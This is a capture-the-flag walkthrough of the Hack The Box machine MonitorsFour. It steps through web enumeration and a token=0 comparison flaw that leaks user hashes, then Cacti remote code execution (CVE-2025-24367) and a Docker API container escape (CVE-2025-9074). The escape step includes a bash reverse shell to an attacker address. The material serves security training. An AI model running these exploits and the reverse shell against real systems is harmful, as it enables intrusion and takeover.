• Platform: Hack The Box
  • Link: MonitorsFour
  • Level: Easy
  • OS: Windows

MonitorsFour starts with the enumeration of a web application and the discovery of a vulnerable endpoint allowing the disclosure of user information. The recovered credentials provide access to both the main interface and a Cacti instance used for network monitoring.

Analysis of the Cacti instance reveals CVE-2025-24367, a vulnerability allowing remote code execution. Exploitation of the flaw leads to initial access within a Docker container hosted on a Windows machine.

Further enumeration of the target identifies an exposed and unauthenticated Docker API. Analysis of the Docker environment reveals CVE-2025-9074, a vulnerability allowing the execution of privileged commands on the host through the Docker Engine API. Exploitation of this flaw ultimately results in container escape and full compromise of the underlying Windows system.

Scanning

nmap -p- --open -T4 -sCV -oA nmap/MonitorsFour {TARGET_IP}

Results

Starting Nmap 7.95 ( https://nmap.org ) at 2026-05-20 07:57 EDT
Nmap scan report for 10.129.48.141
Host is up (0.11s latency).
Not shown: 65533 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE VERSION
80/tcp   open  http    nginx
|_http-title: Did not follow redirect to http://monitorsfour.htb/

5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 177.01 seconds

Nmap finds two open ports:

  • 80 (http) with an nginx web server, and a redirect to monitorsfour.htb
  • 5985, which is the default port for WinRM

We add the hostname to /etc/hosts:

echo "{IP} monitorsfour.htb" | sudo tee -a /etc/hosts

Enumeration

Visiting http://monitorsfour.htb/ we find a website for a network monitoring solution.

MonitorsFour website

The web application does not present any exploitable paths, so we move on to directory enumeration.

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://monitorsfour.htb

MonitorsFour website

An entry named /.env is discovered. We fetch it at http://monitorsfour.htb/.env.

MonitorsFour env

A file is downloaded. It contains database credentials, but we are not able to use them yet.

Next is subdomain enumeration.

ffuf -c -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -t 100 -u http://monitorsfour.htb -H "Host: FUZZ.monitorsfour.htb" -ic -fs 138

MonitorsFour subdomain enumeration

At http://cacti.monitorsfour.htb we find an instance of Cacti, version 1.2.28.

MonitorsFour cacti version

Credentials are needed to log in, so we return to the main website and take a look at the additional endpoints. /user seems interesting; trying to access it leads to an error because of a missing token parameter.

MonitorsFour user directory

We test the logic: both a random value and an empty token fail.

curl "http://monitorsfour.htb/user?token=AAAA"

curl "http://monitorsfour.htb/user?token="

token tests

Further testing reveals 0 as a valid value for token.

ffuf -u 'http://monitorsfour.htb/user?token=FUZZ' -w /usr/share/seclists/Fuzzing/alphanum-case-extra.txt -ac

user endpoint fuzzing

Sending a request with token=0 returns user credentials.

curl "http://monitorsfour.htb/user?token=0"
[
  {
    "id": 2,
    "username": "admin",
    "email": "admin@monitorsfour.htb",
    "password": "56b32eb43e6f15395f6c46c1c9e1cd36",
    "role": "super user",
    "token": "8024b78f83f102da4f",
    "name": "Marcus Higgins",
    "position": "System Administrator",
    "dob": "1978-04-26",
    "start_date": "2021-01-12",
    "salary": "320800.00"
  },
  {
    "id": 5,
    "username": "mwatson",
    "email": "mwatson@monitorsfour.htb",
    "password": "69196959c16b26ef00b77d82cf6eb169",
    "role": "user",
    "token": "0e543210987654321",
    "name": "Michael Watson",
    "position": "Website Administrator",
    "dob": "1985-02-15",
    "start_date": "2021-05-11",
    "salary": "75000.00"
  },
  {
    "id": 6,
    "username": "janderson",
    "email": "janderson@monitorsfour.htb",
    "password": "2a22dcf99190c322d974c8df5ba3256b",
    "role": "user",
    "token": "0e999999999999999",
    "name": "Jennifer Anderson",
    "position": "Network Engineer",
    "dob": "1990-07-16",
    "start_date": "2021-06-20",
    "salary": "68000.00"
  },
  {
    "id": 7,
    "username": "dthompson",
    "email": "dthompson@monitorsfour.htb",
    "password": "8d4a7e7fd08555133e056d9aacb1e519",
    "role": "user",
    "token": "0e111111111111111",
    "name": "David Thompson",
    "position": "Database Manager",
    "dob": "1982-11-23",
    "start_date": "2022-09-15",
    "salary": "83000.00"
  }
]
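Three of the leaked tokens have the form 0e<digits>, which a PHP-style loose comparison (==) treats as the number 0, so a supplied token of 0 compares equal to every one of them. The following is an added example, not code from the page or from the box's backend: it models that comparison beside a strict, constant-time lookup, assuming the endpoint compares the supplied token string against the stored token strings with ==; it does not attempt to reproduce why the admin row was also returned.

```python
import hmac
import re

# Constructed sample data: the token values leaked by the /user endpoint above.
LEAKED_TOKENS = {
    "admin": "8024b78f83f102da4f",
    "mwatson": "0e543210987654321",
    "janderson": "0e999999999999999",
    "dthompson": "0e111111111111111",
}

# PHP "numeric string": optional sign, digits with optional fraction, optional exponent.
_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")


def php_loose_equals(a: str, b: str) -> bool:
    """Model of PHP's == between two strings: if both are numeric strings,
    they are compared as numbers, so "0" == "0e123" is True."""
    if _NUMERIC.match(a) and _NUMERIC.match(b):
        return float(a) == float(b)
    return a == b


def lookup_loose(token: str) -> list[str]:
    """Vulnerable lookup (assumed backend behaviour): every stored token
    that is loosely equal to the supplied one matches."""
    return [user for user, stored in LEAKED_TOKENS.items()
            if php_loose_equals(token, stored)]


def lookup_strict(token: str) -> list[str]:
    """Hardened lookup: byte-for-byte, constant-time equality, no coercion."""
    return [user for user, stored in LEAKED_TOKENS.items()
            if hmac.compare_digest(token.encode(), stored.encode())]


if __name__ == "__main__":
    print("loose,  token=0:", lookup_loose("0"))    # the three 0e tokens match
    print("strict, token=0:", lookup_strict("0"))   # nothing matches
```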

The admin password is recovered: wonderful1.

marcus password

Using admin:wonderful1 we log in to the main website and access the dashboard.

MonitorsFour dashboard

The same credentials do not work on the Cacti instance, but marcus:wonderful1 does.

cacti login

We access the dashboard.

cacti dashboard

Initial Foothold

Poking around the dashboard does not reveal anything exploitable. Searching for Cacti vulnerabilities leads to CVE-2025-24367, with a PoC available here.

Environment Prep

git clone https://github.com/TheCyberGeek/CVE-2025-24367-Cacti-PoC.git

cd CVE-2025-24367-Cacti-PoC

python3 -m venv myvenv

source myvenv/bin/activate

Vulnerability Exploitation

sudo python3 exploit.py -url http://cacti.monitorsfour.htb -u marcus -p wonderful1 -i <ATTACKER_IP> -l <LISTENER_PORT>

CVE-2025-24367

MonitorsFour foothold

The hostname is noteworthy: it is a typical container ID. The target is a Windows machine, but we are currently in a Linux container; the user flag is in /home/marcus.

user flag location

Privilege Escalation

We need to escape the container to access the host system.

Let’s collect some network information.

network data

172.18.0.1 is the Docker bridge gateway (the host-side Docker interface), and 192.168.65.7 is the upstream DNS or external host reachable from Docker.

A common escape technique is abusing the Docker API, so let’s check it.

curl http://192.168.65.7:2375/version

Docker API version

Enumeration of the Docker networking configuration reveals an exposed Docker Remote API at 192.168.65.7:2375. Querying the /version endpoint confirms unauthenticated access to the Docker daemon. The response identifies the environment as Docker Engine Community running on a WSL2-backed Linux kernel (6.6.87.2-microsoft-standard-WSL2).

We enumerate the Docker images.

curl -s http://192.168.65.7:2375/images/json | grep -o '"RepoTags":\[[^]]*\]'

Docker images enumeration

There are three Docker images on the Docker host. Through research we find that version 28.3.2 (seen when querying /version) corresponds to Docker Desktop 4.43.x or newer. Searching for Docker Desktop 4.43.x CVEs, we find CVE-2025-9074, a vulnerability allowing local containers to execute privileged commands on the host via the Docker Engine API.

A PoC is available here. The command below creates a new container.

./cve-2025-9074.sh 192.168.65.7 'bash -c "bash -i >& /dev/tcp/10.10.14.48/9001 0>&1"' 2375

RCE cve_2025_9074

A shell is received on the listener, and we can read the root flag at /host_root/mnt/host/c/Users/Administrator/Desktop/root.txt.

Root flag location